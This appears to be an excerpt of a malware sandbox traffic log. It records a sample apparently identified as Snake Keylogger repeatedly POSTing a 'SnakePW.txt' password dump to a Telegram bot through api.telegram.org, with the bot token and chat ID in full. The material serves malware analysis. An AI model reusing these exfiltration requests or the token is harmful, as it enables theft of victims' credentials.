                            2022-06-26 07:34:14 UTC373OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 35 35 34 38 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570d554840Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:14 UTC374INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:14 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:14 UTC374INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66998,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228854,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            222192.168.2.550132149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:14 UTC374OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570d90e459
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:14 UTC375OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 39 30 65 34 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570d90e459Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:14 UTC375INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:14 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:14 UTC376INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67000,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228854,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            223192.168.2.550133149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:14 UTC376OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570dc7be8e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:14 UTC376OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 63 37 62 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570dc7be8eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:15 UTC377INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:15 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:15 UTC377INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67001,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228855,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            224192.168.2.550134149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:15 UTC378OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570e1403db
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:15 UTC378OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 31 34 30 33 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570e1403dbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:15 UTC379INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:15 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:15 UTC379INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67002,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228855,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            225192.168.2.550135149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:15 UTC379OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570e4f9f4c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:15 UTC380OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 34 66 39 66 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570e4f9f4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:16 UTC380INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:16 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:16 UTC381INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67003,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            226192.168.2.550136149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:16 UTC381OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570e8d9c05
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:16 UTC381OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 38 64 39 63 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570e8d9c05Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:16 UTC382INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:16 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:16 UTC382INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67004,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            227192.168.2.550137149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:16 UTC383OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570ecb98cc
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:16 UTC383OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 63 62 39 38 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570ecb98ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:16 UTC384INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:16 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:16 UTC384INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67005,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            228192.168.2.550138149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:17 UTC385OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570f0733b7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:17 UTC385OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 30 37 33 33 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570f0733b7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:17 UTC385INHTTP/1.1 200 OK
